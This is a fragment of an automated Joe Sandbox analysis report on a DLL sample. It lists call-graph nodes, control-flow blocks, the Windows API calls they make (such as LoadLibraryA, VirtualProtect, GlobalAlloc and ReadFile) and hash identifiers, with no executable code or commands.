MultiByteToWideChar 20300 6c552290 20295->20300 20301 6c55227f GetStringTypeW 20295->20301 20302 6c544618 ___wtomb_environ 67 API calls 20296->20302 20297->20295 20297->20304 20298->20297 20305 6c551006 20300->20305 20301->20300 20302->20304 20304->20290 20306 6c551023 20305->20306 20307 6c551012 20305->20307 20306->20304 20307->20306 20308 6c544618 ___wtomb_environ 67 API calls 20307->20308 20308->20306 20310 6c554def 20309->20310 20312 6c554dea 20309->20312 20311 6c551026 __tzset_nolock 90 API calls 20310->20311 20311->20312 20313 6c543f34 __invoke_watson 5 API calls 20312->20313 20314 6c5522c0 20313->20314 20314->20292 20314->20304 20315 6c554e05 20314->20315 20316 6c554e45 GetCPInfo 20315->20316 20320 6c554ecf 20315->20320 20317 6c554e5c 20316->20317 20318 6c554eba MultiByteToWideChar 20316->20318 20317->20318 20321 6c554e62 GetCPInfo 20317->20321 20318->20320 20324 6c554e75 _strlen 20318->20324 20319 6c543f34 __invoke_watson 5 API calls 20322 6c5522e1 20319->20322 20320->20319 20321->20318 20323 6c554e6f 20321->20323 20322->20292 20322->20304 20323->20318 20323->20324 20325 6c5449fe _malloc 67 API calls 20324->20325 20329 6c554ea7 _memset __crtCompareStringA_stat 20324->20329 20325->20329 20326 6c554f04 MultiByteToWideChar 20327 6c554f1c 20326->20327 20328 6c554f3b 20326->20328 20331 6c554f40 20327->20331 20332 6c554f23 WideCharToMultiByte 20327->20332 20330 6c551006 __freea 67 API calls 20328->20330 20329->20320 20329->20326 20330->20320 20333 6c554f5f 20331->20333 20334 6c554f4b WideCharToMultiByte 20331->20334 20332->20328 20335 6c54a608 __calloc_crt 67 API calls 20333->20335 20334->20328 20334->20333 20336 6c554f67 20335->20336 20336->20328 20337 6c554f70 WideCharToMultiByte 20336->20337 20337->20328 20338 6c554f82 20337->20338 20339 6c544618 ___wtomb_environ 67 API calls 20338->20339 20339->20328 20341 6c551da0 LCMapStringW 20340->20341 20343 6c551dbb 20340->20343 20342 6c551dc3 GetLastError 20341->20342 20341->20343 20342->20343 20344 6c551fb9 20343->20344 20346 6c551e15 20343->20346 20348 6c554dbc ___ansicp 91 API calls 20344->20348 20345 6c551fb0 20349 6c543f34 __invoke_watson 5 API calls 20345->20349 20346->20345 20347 6c551e2e MultiByteToWideChar 20346->20347 20347->20345 20356 6c551e5b 20347->20356 20350 6c551fe1 20348->20350 20351 6c54fd3c 20349->20351 20350->20345 20352 6c5520d5 LCMapStringA 20350->20352 20353 6c551ffa 20350->20353 20351->20270 20357 6c552031 20352->20357 20354 6c554e05 ___convertcp 74 API calls 20353->20354 20360 6c55200c 20354->20360 20355 6c551eac MultiByteToWideChar 20361 6c551ec5 LCMapStringW 20355->20361 20362 6c551fa7 20355->20362 20359 6c5449fe _malloc 67 API calls 20356->20359 20367 6c551e74 __crtCompareStringA_stat 20356->20367 20358 6c5520fc 20357->20358 20363 6c544618 ___wtomb_environ 67 API calls 20357->20363 20358->20345 20369 6c544618 ___wtomb_environ 67 API calls 20358->20369 20359->20367 20360->20345 20364 6c552016 LCMapStringA 20360->20364 20361->20362 20366 6c551ee6 20361->20366 20365 6c551006 __freea 67 API calls 20362->20365 20363->20358 20364->20357 20372 6c552038 20364->20372 20365->20345 20368 6c551eef 20366->20368 20371 6c551f18 20366->20371 20367->20345 20367->20355 20368->20362 20370 6c551f01 LCMapStringW 20368->20370 20369->20345 20370->20362 20374 6c551f33 __crtCompareStringA_stat 20371->20374 20376 6c5449fe _malloc 67 API calls 20371->20376 20375 6c552049 _memset __crtCompareStringA_stat 20372->20375 20377 6c5449fe _malloc 67 API calls 20372->20377 20373 6c551f67 LCMapStringW 20378 6c551fa1 20373->20378 20379 6c551f7f WideCharToMultiByte 20373->20379 20374->20362 20374->20373 20375->20357 20381 6c552087 LCMapStringA 20375->20381 20376->20374 20377->20375 20380 6c551006 __freea 67 API calls 20378->20380 20379->20378 20380->20362 20383 6c5520a7 20381->20383 20384 6c5520a3 20381->20384 20385 6c554e05 ___convertcp 74 API calls 20383->20385 20386 6c551006 __freea 67 API calls 20384->20386 20385->20384 20386->20357 20387->20260 20389 6c54df88 20388->20389 20390 6c549fb8 __encode_pointer 6 API calls 20389->20390 20391 6c54dfa0 20389->20391 20390->20389 20391->20041 20395 6c544478 20392->20395 20394 6c5444c1 20394->20043 20396 6c544484 __commit 20395->20396 20403 6c545c6b 20396->20403 20402 6c5444a5 __commit 20402->20394 20404 6c54a914 __lock 67 API calls 20403->20404 20405 6c544489 20404->20405 20406 6c54438d 20405->20406 20407 6c54a033 __decode_pointer 6 API calls 20406->20407 20408 6c5443a1 20407->20408 20409 6c54a033 __decode_pointer 6 API calls 20408->20409 20410 6c5443b1 20409->20410 20411 6c547637 __msize 68 API calls 20410->20411 20420 6c544434 20410->20420 20412 6c5443cf 20411->20412 20414 6c5443f9 20412->20414 20415 6c5443ea 20412->20415 20425 6c54441b 20412->20425 20413 6c549fb8 __encode_pointer 6 API calls 20416 6c544429 20413->20416 20418 6c5443f3 20414->20418 20414->20420 20429 6c54a654 20415->20429 20419 6c549fb8 __encode_pointer 6 API calls 20416->20419 20418->20414 20421 6c54a654 __realloc_crt 73 API calls 20418->20421 20422 6c54440f 20418->20422 20419->20420 20426 6c5444ae 20420->20426 20423 6c544409 20421->20423 20424 6c549fb8 __encode_pointer 6 API calls 20422->20424 20423->20420 20423->20422 20424->20425 20425->20413 20434 6c545c74 20426->20434 20431 6c54a65d 20429->20431 20430 6c544ac8 _realloc 72 API calls 20430->20431 20431->20430 20432 6c54a69c 20431->20432 20433 6c54a67d Sleep 20431->20433 20432->20418 20433->20431 20437 6c54a83a RtlLeaveCriticalSection 20434->20437 20436 6c5444b3 20436->20402 20437->20436 20439 6c545d4f __commit 20438->20439 20440 6c54a914 __lock 67 API calls 20439->20440 20441 6c545d56 20440->20441 20443 6c54a033 __decode_pointer 6 API calls 20441->20443 20444 6c545e0f __initterm 20441->20444 20447 6c545d8d 20443->20447 20455 6c545e5a 20444->20455 20446 6c545e57 __commit 20446->20068 20447->20444 20450 6c54a033 __decode_pointer 6 API calls 20447->20450 20449 6c545e4e 20451 6c545c53 _doexit 3 API calls 20449->20451 20454 6c545da2 20450->20454 20451->20446 20452 6c54a02a 6 API calls _doexit 20452->20454 20453 6c54a033 6 API calls __decode_pointer 20453->20454 20454->20444 20454->20452 20454->20453 20456 6c545e60 20455->20456 20457 6c545e3b 20455->20457 20460 6c54a83a RtlLeaveCriticalSection 20456->20460 20457->20446 20459 6c54a83a RtlLeaveCriticalSection 20457->20459 20459->20449 20460->20457 20462 6c54a2a5 __commit 20461->20462 20463 6c54a3a7 __commit 20462->20463 20464 6c544618 ___wtomb_environ 67 API calls 20462->20464 20468 6c54a2bd 20462->20468 20463->20071 20464->20468 20465 6c544618 ___wtomb_environ 67 API calls 20466 6c54a2cb 20465->20466 20467 6c54a2d9 20466->20467 20469 6c544618 ___wtomb_environ 67 API calls 20466->20469 20470 6c54a2e7 20467->20470 20471 6c544618 ___wtomb_environ 67 API calls 20467->20471 20468->20465 20468->20466 20469->20467 20472 6c54a2f5 20470->20472 20474 6c544618 ___wtomb_environ 67 API calls 20470->20474 20471->20470 20473 6c54a303 20472->20473 20475 6c544618 ___wtomb_environ 67 API calls 20472->20475 20476 6c54a311 20473->20476 20477 6c544618 ___wtomb_environ 67 API calls 20473->20477 20474->20472 20475->20473 20478 6c54a322 20476->20478 20479 6c544618 ___wtomb_environ 67 API calls 20476->20479 20477->20476 20480 6c54a914 __lock 67 API calls 20478->20480 20479->20478 20481 6c54a32a 20480->20481 20482 6c54a336 InterlockedDecrement 20481->20482 20483 6c54a34f 20481->20483 20482->20483 20484 6c54a341 20482->20484 20497 6c54a3b3 20483->20497 20484->20483 20487 6c544618 ___wtomb_environ 67 API calls 20484->20487 20487->20483 20488 6c54a914 __lock 67 API calls 20489 6c54a363 20488->20489 20490 6c54a394 20489->20490 20492 6c5504a3 ___removelocaleref 8 API calls 20489->20492 20500 6c54a3bf 20490->20500 20495 6c54a378 20492->20495 20494 6c544618 ___wtomb_environ 67 API calls 20494->20463 20495->20490 20496 6c5502cb ___freetlocinfo 67 API calls 20495->20496 20496->20490 20503 6c54a83a RtlLeaveCriticalSection 20497->20503 20499 6c54a35c 20499->20488 20504 6c54a83a RtlLeaveCriticalSection 20500->20504 20502 6c54a3a1 20502->20494 20503->20499 20504->20502

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 25 6c5363f0-6c5363f8 26 6c5363fe-6c53640f 25->26 27 6c53649c-6c5364c1 25->27 30 6c536413-6c53641e 26->30 28 6c5364c3 27->28 29 6c536524 27->29 34 6c5364c5-6c5364cb 28->34 33 6c536526-6c536551 29->33 31 6c536481 30->31 32 6c536420 30->32 36 6c536483-6c536487 31->36 35 6c536422-6c536427 32->35 37 6c5365f1 33->37 38 6c536557-6c536568 33->38 34->34 39 6c5364cd-6c5364cf 34->39 35->35 41 6c536429-6c53642b 35->41 42 6c53671b-6c53671e 36->42 43 6c53648d-6c536492 36->43 44 6c5365f3-6c536661 LoadLibraryA VirtualProtect call 6c5367f8 VirtualProtect 37->44 45 6c53656c-6c536577 38->45 39->29 40 6c5364d1-6c5364d7 39->40 46 6c5366f0 40->46 47 6c5364dd-6c5364e6 40->47 41->31 48 6c53642d-6c536433 41->48 43->30 49 6c536498 43->49 64 6c536663 44->64 65 6c536682-6c5366a9 44->65 51 6c5365da 45->51 52 6c536579 45->52 55 6c5364ea-6c536501 47->55 56 6c5366e6 48->56 57 6c536439-6c536443 48->57 49->27 54 6c5365dc-6c5365e0 51->54 53 6c53657b-6c536580 52->53 53->53 59 6c536582-6c536584 53->59 61 6c5365e6-6c5365eb 54->61 62 6c536704-6c536716 54->62 55->55 63 6c536503-6c536513 55->63 69 6c5366fa 56->69 60 6c536447-6c53645e 57->60 59->51 66 6c536586-6c53658c 59->66 60->60 67 6c536460-6c536471 60->67 61->37 61->45 62->44 63->33 68 6c536515-6c536522 63->68 70 6c536667-6c536680 64->70 66->69 72 6c536592-6c53659c 66->72 67->36 73 6c536473-6c53647f 67->73 68->33 69->62 70->65 70->70 74 6c5365a0-6c5365b7 72->74 73->36 74->74 75 6c5365b9-6c5365ca 74->75 75->54 76 6c5365cc-6c5365d8 75->76 76->54
                          APIs
                          • LoadLibraryA.KERNELBASE(00000000), ref: 6C536602
                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C53663B
                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6C536654
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 7d18269d3a19ff6aeee86ed1d332651a57c82d39dfe884e352e81daae7c28854
                          • Instruction ID: b8987e8362ff49fd2ca035aabc184e6607c689bbacdb677ee1b8eda4ae7aa4d2
                          • Opcode Fuzzy Hash: 7d18269d3a19ff6aeee86ed1d332651a57c82d39dfe884e352e81daae7c28854
                          • Instruction Fuzzy Hash: 7FA1E2306083658FC315CF19C88062AFBE1BFC5308F09996DE89997316EB71E955CB95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 105 6c535ca0-6c535d95 call 6c53af9c * 2 call 6c53afc3 * 2 call 6c5364e0 GetPEB 116 6c535d97 105->116 117 6c535de4 105->117 119 6c535d99-6c535da3 116->119 118 6c535de6-6c535e1d 117->118 122 6c535e23-6c535e3c 118->122 123 6c535eba-6c535f0c GlobalAlloc 118->123 120 6c535dd6-6c535dd8 119->120 121 6c535da5-6c535dab 119->121 127 6c5367e1-6c5367e4 120->127 128 6c535dde-6c535de2 120->128 124 6c535dae-6c535db5 121->124 129 6c535e40-6c535e4e 122->129 125 6c535f12-6c535f2b 123->125 126 6c535fad 123->126 131 6c535dc1-6c535dcd 124->131 132 6c535db7-6c535dbd 124->132 133 6c535f2f-6c535f3d 125->133 130 6c535faf-6c535fce 126->130 127->118 128->117 128->119 134 6c535ea3 129->134 135 6c535e50 129->135 148 6c535fd0 130->148 149 6c535fe7-6c535fea 130->149 131->124 139 6c535dcf-6c535dd3 131->139 132->131 136 6c535dbf 132->136 137 6c535f92 133->137 138 6c535f3f 133->138 140 6c535ea5-6c535ea9 134->140 141 6c535e52-6c535e58 135->141 136->131 143 6c535f94-6c535f98 137->143 144 6c535f41-6c535f47 138->144 139->120 145 6c5367c3-6c5367d8 140->145 146 6c535eaf-6c535eb4 140->146 141->141 147 6c535e5a-6c535e5c 141->147 153 6c5367a5-6c5367be 143->153 154 6c535f9e-6c535fa3 143->154 144->144 151 6c535f49-6c535f4b 144->151 146->129 152 6c535eb6 146->152 147->134 155 6c535e5e-6c535e64 147->155 158 6c535fd2-6c535fe5 148->158 159 6c535ffe-6c536038 149->159 160 6c535fec 149->160 151->137 161 6c535f4d-6c535f53 151->161 152->123 153->130 154->133 162 6c535fa5-6c535fa9 154->162 156 6c5366aa-6c5366af 155->156 157 6c535e6a-6c535e6e 155->157 156->140 169 6c535e97-6c535ea1 156->169 157->123 158->149 158->158 166 6c5360d9 159->166 167 6c53603e-6c536057 159->167 163 6c535fee-6c535ffc 160->163 164 6c5366b4 161->164 165 6c535f59-6c535f5d 161->165 162->126 163->159 163->163 177 6c5366be 164->177 171 6c535f5f-6c535f75 165->171 170 6c5360db-6c536139 CreateFileW 166->170 172 6c53605b-6c536069 167->172 169->140 179 6c53613f-6c53615c 170->179 180 6c5361de-6c536780 170->180 171->171 174 6c535f77-6c535f84 171->174 175 6c53606b 172->175 176 6c5360be 172->176 174->143 181 6c535f86-6c535f90 174->181 182 6c53606d-6c536073 175->182 178 6c5360c0-6c5360c4 176->178 183 6c536788-6c5367a0 177->183 178->183 184 6c5360ca-6c5360cf 178->184 179->127 181->143 182->182 186 6c536075-6c536077 182->186 183->170 184->172 188 6c5360d1-6c5360d5 184->188 186->176 189 6c536079-6c53607f 186->189 188->166 189->177 191 6c536085-6c536089 189->191 192 6c53608b-6c5360a1 191->192 192->192 194 6c5360a3-6c5360b0 192->194 194->178 195 6c5360b2-6c5360bc 194->195 195->178
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: LibraryLoad_memset
                          • String ID:
                          • API String ID: 2997193564-0
                          • Opcode ID: a09681f15d80294c0ad333df92c3a0e2ce2985a98371f0b1e4341be7bca85b78
                          • Instruction ID: 2d57ef7a92c4e3743a122bd10eaf4bce01ec2b99403c66fd82c15792486f8476
                          • Opcode Fuzzy Hash: a09681f15d80294c0ad333df92c3a0e2ce2985a98371f0b1e4341be7bca85b78
                          • Instruction Fuzzy Hash: 43E18BB0A087158FC714CF1AC89062AFBF1FF88308F55992DE89A87711EB30E855CB95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 332 6c535e70-6c535e86 332->332 333 6c535e88-6c535e8c 332->333 334 6c535e90-6c535e95 333->334 335 6c535e97-6c535ea1 334->335 336 6c535ea5-6c535ea9 334->336 335->336 337 6c5367c3-6c5367d8 336->337 338 6c535eaf-6c535eb4 336->338 340 6c535e40-6c535e4e 338->340 341 6c535eb6 338->341 343 6c535ea3 340->343 344 6c535e50 340->344 342 6c535eba-6c535f0c GlobalAlloc 341->342 345 6c535f12-6c535f2b 342->345 346 6c535fad 342->346 343->336 347 6c535e52-6c535e58 344->347 349 6c535f2f-6c535f3d 345->349 348 6c535faf-6c535fce 346->348 347->347 350 6c535e5a-6c535e5c 347->350 359 6c535fd0 348->359 360 6c535fe7-6c535fea 348->360 351 6c535f92 349->351 352 6c535f3f 349->352 350->343 353 6c535e5e-6c535e64 350->353 357 6c535f94-6c535f98 351->357 358 6c535f41-6c535f47 352->358 354 6c5366aa-6c5366af 353->354 355 6c535e6a-6c535e6e 353->355 354->334 355->342 362 6c5367a5-6c5367be 357->362 363 6c535f9e-6c535fa3 357->363 358->358 361 6c535f49-6c535f4b 358->361 364 6c535fd2-6c535fe5 359->364 365 6c535ffe-6c536038 360->365 366 6c535fec 360->366 361->351 367 6c535f4d-6c535f53 361->367 362->348 363->349 368 6c535fa5-6c535fa9 363->368 364->360 364->364 372 6c5360d9 365->372 373 6c53603e-6c536057 365->373 369 6c535fee-6c535ffc 366->369 370 6c5366b4 367->370 371 6c535f59-6c535f5d 367->371 368->346 369->365 369->369 381 6c5366be 370->381 375 6c535f5f-6c535f75 371->375 374 6c5360db-6c536139 CreateFileW 372->374 376 6c53605b-6c536069 373->376 383 6c53613f-6c5367e4 374->383 384 6c5361de-6c536780 374->384 375->375 378 6c535f77-6c535f84 375->378 379 6c53606b 376->379 380 6c5360be 376->380 378->357 385 6c535f86-6c535f90 378->385 386 6c53606d-6c536073 379->386 382 6c5360c0-6c5360c4 380->382 387 6c536788-6c5367a0 381->387 382->387 388 6c5360ca-6c5360cf 382->388 383->342 400 6c535e23-6c535e3c 383->400 385->357 386->386 390 6c536075-6c536077 386->390 387->374 388->376 392 6c5360d1-6c5360d5 388->392 390->380 394 6c536079-6c53607f 390->394 392->372 394->381 397 6c536085-6c536089 394->397 398 6c53608b-6c5360a1 397->398 398->398 401 6c5360a3-6c5360b0 398->401 400->340 401->382 402 6c5360b2-6c5360bc 401->402 402->382
                          APIs
                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6C535ECA
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AllocGlobal
                          • String ID:
                          • API String ID: 3761449716-0
                          • Opcode ID: 073e685717d859c2270930c0e3e5bf8d2a9821b26d70affaecabaa57c31a1bbb
                          • Instruction ID: 3cd5ce51d0460104234f3868cc047e1463fb2ce9a4ad7eae3407c89d91c1e7a3
                          • Opcode Fuzzy Hash: 073e685717d859c2270930c0e3e5bf8d2a9821b26d70affaecabaa57c31a1bbb
                          • Instruction Fuzzy Hash: E2A1A2B060C3268FC718CF19C89063AB7F2BF89304F55996DE89A87756E730E955CB81

                          Control-flow Graph

                          APIs
                          • RtlEnterCriticalSection.NTDLL(6C5632EC), ref: 6C53BC61
                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6C5632D0,6C5632D0,?,6C53C0A4,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BCB7
                          • GlobalHandle.KERNEL32(00E5AB98), ref: 6C53BCC0
                          • GlobalUnlock.KERNEL32(00000000), ref: 6C53BCCA
                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6C53BCE3
                          • GlobalHandle.KERNEL32(00E5AB98), ref: 6C53BCF5
                          • GlobalLock.KERNEL32(00000000), ref: 6C53BCFC
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BD05
                          • GlobalLock.KERNEL32(00000000), ref: 6C53BD11
                          • _memset.LIBCMT ref: 6C53BD2B
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BD59
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                          • String ID:
                          • API String ID: 496899490-0
                          • Opcode ID: 408b32378aa411ee5079e38533456eafadb2fa8b5fc3fa38726e3f5429b430cb
                          • Instruction ID: 36a171dd9d54c4d9432c7d85597d8b8fed66283d5e803134215052b00969f64d
                          • Opcode Fuzzy Hash: 408b32378aa411ee5079e38533456eafadb2fa8b5fc3fa38726e3f5429b430cb
                          • Instruction Fuzzy Hash: 5B31D071600B15EFDB21DF64CC89B5ABBF9FF80304B15496EE55AD7A10EB30E8448B90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 77 6c5364e0-6c5364e8 78 6c5364ea-6c536501 77->78 78->78 79 6c536503-6c536513 78->79 80 6c536526-6c536551 79->80 81 6c536515-6c536522 79->81 82 6c5365f1 80->82 83 6c536557-6c536568 80->83 81->80 84 6c5365f3-6c536661 LoadLibraryA VirtualProtect call 6c5367f8 VirtualProtect 82->84 85 6c53656c-6c536577 83->85 95 6c536663 84->95 96 6c536682-6c5366a9 84->96 87 6c5365da 85->87 88 6c536579 85->88 90 6c5365dc-6c5365e0 87->90 89 6c53657b-6c536580 88->89 89->89 92 6c536582-6c536584 89->92 93 6c5365e6-6c5365eb 90->93 94 6c536704-6c536716 90->94 92->87 97 6c536586-6c53658c 92->97 93->82 93->85 94->84 98 6c536667-6c536680 95->98 100 6c536592-6c53659c 97->100 101 6c5366fa 97->101 98->96 98->98 102 6c5365a0-6c5365b7 100->102 101->94 102->102 103 6c5365b9-6c5365ca 102->103 103->90 104 6c5365cc-6c5365d8 103->104 104->90
                          APIs
                          • LoadLibraryA.KERNELBASE(00000000), ref: 6C536602
                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C53663B
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: LibraryLoadProtectVirtual
                          • String ID:
                          • API String ID: 3279857687-0
                          • Opcode ID: 9577c91a7365e7158946c7ba15e843e742d1158a45e9bdbc0990b3e8c8f71e48
                          • Instruction ID: 6b888e49d4bf51fd7440b3629ae5c98cce1ba3e25e990f62815497f997b076f2
                          • Opcode Fuzzy Hash: 9577c91a7365e7158946c7ba15e843e742d1158a45e9bdbc0990b3e8c8f71e48
                          • Instruction Fuzzy Hash: 7951F5316083658FC715CF19C88062AFBF5BFC9308F59896DE88987316EA30E906CB95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 197 6c536750-6c536762 ReadFile 199 6c5361f0-6c536207 197->199 200 6c53630a-6c536323 197->200 201 6c536325-6c536329 200->201 202 6c53634d-6c536368 200->202 204 6c536738 201->204 205 6c53632f 201->205 206 6c5363cb 202->206 207 6c53636a 202->207 204->197 209 6c536331-6c53633c 205->209 208 6c5363cd-6c5363ee 206->208 210 6c53636c-6c536372 207->210 211 6c5366dc 208->211 209->209 212 6c53633e-6c536347 209->212 210->210 213 6c536374-6c536376 210->213 211->204 212->202 215 6c536349 212->215 213->206 214 6c536378-6c53637e 213->214 214->211 216 6c536384-6c53638d 214->216 215->202 217 6c536391-6c5363a8 216->217 217->217 218 6c5363aa-6c5363ba 217->218 218->208 219 6c5363bc-6c5363c9 218->219 219->208
                          APIs
                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C55C168), ref: 6C536300
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 60f7e9650be2504ff8e16b7a8e5d273efc771413632a2dc2269b8a53189a8bed
                          • Instruction ID: 7956eacc44193da0e69f2678ad3d46a706fc418c9dd9f0d68e21e673eb79cce6
                          • Opcode Fuzzy Hash: 60f7e9650be2504ff8e16b7a8e5d273efc771413632a2dc2269b8a53189a8bed
                          • Instruction Fuzzy Hash: 9541DF31A087158FC704CF19CC9067AB7E2FBC5314F19896CE88A8B316EA31E8558B84

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 220 6c5362d0-6c5362d5 221 6c536742-6c53674e 220->221 222 6c5362db-6c5362e0 220->222 223 6c5362e2-6c5362f1 222->223 224 6c53626d-6c53627b 222->224 228 6c5366d2 223->228 226 6c5362cf 224->226 227 6c53627d 224->227 230 6c5362d1-6c5362d5 226->230 229 6c53627f-6c536284 227->229 228->221 229->229 231 6c536286-6c536288 229->231 230->221 230->222 231->226 232 6c53628a-6c536290 231->232 232->228 233 6c536296-6c53629a 232->233 234 6c53629c-6c5362b2 233->234 234->234 235 6c5362b4-6c5362c1 234->235 235->230 236 6c5362c3-6c5362cd 235->236 236->230
                          APIs
                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C55C168), ref: 6C536300
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: c0705672e5059a2723f5626f48db6b2a8d311d727e778840c64d6e93b7243879
                          • Instruction ID: e30312aa27b68a23a92403c7459ffc403a6baffa6725b116f2da1091a23dcb2b
                          • Opcode Fuzzy Hash: c0705672e5059a2723f5626f48db6b2a8d311d727e778840c64d6e93b7243879
                          • Instruction Fuzzy Hash: 5531D131A097158FC715CF19CC9067AB7E2BFC4314F1A996CE88A9B316EA30F855CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 237 6c53c050-6c53c068 call 6c5450c9 240 6c53c06a call 6c536dc1 237->240 241 6c53c06f-6c53c072 237->241 240->241 243 6c53c074-6c53c07c 241->243 244 6c53c0aa-6c53c0bb call 6c53ba5b 241->244 246 6c53c09f call 6c53bc4e 243->246 247 6c53c07e-6c53c09d call 6c53bd66 243->247 253 6c53c0d0-6c53c0d7 call 6c5451a1 244->253 254 6c53c0bd-6c53c0cb call 6c53be0d 244->254 252 6c53c0a4-6c53c0a8 246->252 247->240 247->246 252->240 252->244 254->253
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6C53C057
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          Memory Dump Source
